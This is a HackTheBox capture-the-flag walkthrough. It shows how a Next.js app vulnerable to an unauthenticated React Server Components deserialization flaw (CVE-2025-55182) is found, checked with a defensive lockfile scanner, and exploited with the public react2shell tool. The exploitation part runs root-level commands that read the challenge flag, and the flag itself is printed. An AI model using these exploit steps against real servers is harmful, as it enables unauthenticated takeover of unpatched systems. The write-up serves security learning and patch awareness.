
HackTheBox ReactOOPS (Web challenge) — Full Walkthrough


ReactOOPS is a web-focused challenge that demonstrates how modern JavaScript frameworks can introduce critical backend vulnerabilities when misconfigured. In this walkthrough, we enumerate a Next.js application, identify a vulnerable React Server Components implementation, validate the issue safely, and exploit it to achieve Remote Code Execution (RCE).

This challenge highlights the risks of unsafe deserialization in server-side rendering environments and shows how a real-world CVE can translate directly into full system compromise.


Web Enumeration

Curling to gather some info

We begin by inspecting the application using curl to analyze response headers and identify the underlying technology stack.

┌──(unknown㉿kali)-[~/Downloads]
└─$ curl -v 154.57.164.74:31102
*   Trying 154.57.164.74:31102...
* Established connection to 154.57.164.74 (154.57.164.74 port 31102) from 192.168.1.9 port 54110 
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 154.57.164.74:31102
> User-Agent: curl/8.17.0
> Accept: */*
> 
* Request completely sent off
< HTTP/1.1 200 OK
< Vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch, Accept-Encoding
< x-nextjs-cache: HIT
< x-nextjs-prerender: 1
< x-nextjs-prerender: 1
< x-nextjs-stale-time: 300
< X-Powered-By: Next.js
< Cache-Control: s-maxage=31536000
< ETag: "vua23c33dghj7"
< Content-Type: text/html; charset=utf-8
< Content-Length: 22725
< Date: Tue, 17 Feb 2026 15:19:59 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5

From the headers, we identify:

  • X-Powered-By: Next.js

  • Vary: rsc (React Server Components)

This confirms that the application is running Next.js with React Server Components (RSC).

A recently disclosed vulnerability affecting specific versions of React Server Components allows unauthenticated Remote Code Execution through unsafe deserialization of server function payloads.


Vulnerability Overview

The vulnerability (CVE-2025-55182 / CVE-2025-66478) affects:

  • React Server Components versions 19.0.0 – 19.2.0

  • Packages including:

    • react-server-dom-webpack

    • react-server-dom-turbopack

    • react-server-dom-parcel

The issue arises because the server unsafely deserializes client-controlled input sent to server function endpoints.

Improper validation allows an attacker to craft a payload that the server interprets and executes, leading to full Remote Code Execution without authentication.
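The fastest defensive check for this bug is an inventory one: is any of the affected packages installed at a version in the 19.0.0 to 19.2.0 range? The following script is an added example (not part of the walkthrough or of react2shell) that walks the `packages` map of a `package-lock.json` and flags the three `react-server-dom-*` packages named above, plus a Next.js version below the 16.0.7 release the detection tool recommends. The lockfile contents are constructed for the example; the function names are my own.

```python
"""Scan a package-lock.json for the RSC packages affected by CVE-2025-55182 / CVE-2025-66478.
Version bounds come from the writeup: react-server-dom-* 19.0.0-19.2.0 affected,
React 19.2.1+ and Next.js 16.0.7+ fixed. Added example, not the challenge's code."""
import json
import re

AFFECTED_RSC_PACKAGES = (
    "react-server-dom-webpack",
    "react-server-dom-turbopack",
    "react-server-dom-parcel",
)
RSC_AFFECTED_RANGE = ((19, 0, 0), (19, 2, 0))  # inclusive on both ends
NEXT_FIXED = (16, 0, 7)  # release named by the detection tool; other major lines
                         # have their own patched releases (check the vendor advisory)

def parse_version(version: str) -> tuple:
    """'19.2.0' or '19.2.0-canary.1' -> (19, 2, 0); pre-release suffixes are dropped."""
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(p) for p in m.groups())

def find_vulnerable(lock: dict) -> list[str]:
    """Return one finding per installed package (lockfileVersion 2/3 'packages' map)
    that sits in the affected RSC range or below the fixed Next.js release."""
    findings = []
    for path, meta in lock.get("packages", {}).items():
        # Keys look like "node_modules/<name>" (nested: ".../node_modules/<name>");
        # the empty key is the project root and carries its own "name".
        name = path.rsplit("node_modules/", 1)[-1] if path else meta.get("name", "")
        version = meta.get("version")
        if not name or not version:
            continue
        v = parse_version(version)
        if name in AFFECTED_RSC_PACKAGES and RSC_AFFECTED_RANGE[0] <= v <= RSC_AFFECTED_RANGE[1]:
            findings.append(f"{name}@{version}: affected, upgrade to 19.2.1 or later")
        elif name == "next" and v < NEXT_FIXED:
            findings.append(f"next@{version}: below the 16.0.7 release named in the advisory")
    return findings

# Constructed sample lockfile: one affected RSC package, one patched one, an older Next.js.
SAMPLE_LOCK = json.loads("""{
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "reactoops-app", "version": "0.1.0"},
    "node_modules/next": {"version": "15.3.2"},
    "node_modules/react-server-dom-webpack": {"version": "19.2.0"},
    "node_modules/react-server-dom-turbopack": {"version": "19.2.1"}
  }
}""")

if __name__ == "__main__":
    for line in find_vulnerable(SAMPLE_LOCK) or ["no affected packages found"]:
        print(line)
```

Run it against a real lockfile with `find_vulnerable(json.load(open("package-lock.json")))`; a standalone Next.js build like the one on the target ships its lockfile under the application root, so the same check works on a deployed image.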


Exploitation

To test and exploit the vulnerability, we use a public proof-of-concept tool.

Downloading react2shell

git clone https://github.com/freeqaz/react2shell.git
chmod +x react2shell/*.sh

Vulnerability Detection

Before exploitation, we verify whether the target is vulnerable.

┌──(unknown㉿kali)-[~/HTB/flagweb/react2shell]
└─$ ./detect.sh http://react.htb:31102/
[*] React2Shell Detection Probe (CVE-2025-55182 / CVE-2025-66478)
[*] Target: http://react.htb:31102/

[*] HTTP Status: 500
[!] VULNERABLE - Server returned 500 with E{"digest" pattern

[*] Response body:
0:{"a":"$@1","f":"","b":"s8I48LfEDhqpCdFN5-HbU"}
1:E{"digest":"346246470"}

[!] This server is running a vulnerable version of React RSC / Next.js
[!] Upgrade to Next.js 16.0.7+ or React 19.2.1+ immediately

The detection script confirms that the application is vulnerable.


Remote Code Execution

We now attempt to execute a simple command to confirm RCE.

┌──(unknown㉿kali)-[~/HTB/flagweb/react2shell]
└─$ ./exploit-redirect.sh -q http://react.htb:31102 "whoami"
root

The server successfully executes the command, confirming full Remote Code Execution.


Enumerating the Application Directory

┌──(unknown㉿kali)-[~/HTB/flagweb/react2shell]
└─$ ./exploit-redirect.sh -q http://react.htb:31102 "pwd"

/app/.next/standalone

┌──(unknown㉿kali)-[~/HTB/flagweb/react2shell]
└─$ ./exploit-redirect.sh -q http://react.htb:31102 "ls /app"

app
flag.txt
next-env.d.ts
next.config.mjs
node_modules
package-lock.json
package.json
postcss.config.mjs
public
tailwind.config.ts
tsconfig.json

We identify a flag.txt file inside /app.


Getting the Flag

└─$ ./exploit-redirect.sh -q http://react.htb:31102 "cat /app/flag.txt"

HTB{jus7_1n_c4s3_y0u_m1ss3d_r34ct2sh3ll___cr1t1c4l_un4uth3nt1c4t3d_RCE_1n_R34ct___CVE-2025-55182}

Flag successfully retrieved.


Although this was a relatively straightforward challenge, it demonstrates how severe the impact of real-world vulnerabilities can be when organizations fail to apply security patches in a timely manner.

In this case, an unpatched React Server Components implementation allowed unauthenticated Remote Code Execution as root, meaning an attacker could gain full control of the server without valid credentials.

Even modern frameworks like React and Next.js are not immune to critical vulnerabilities. This highlights the importance of proper patch management, continuous monitoring, and staying informed about newly disclosed CVEs.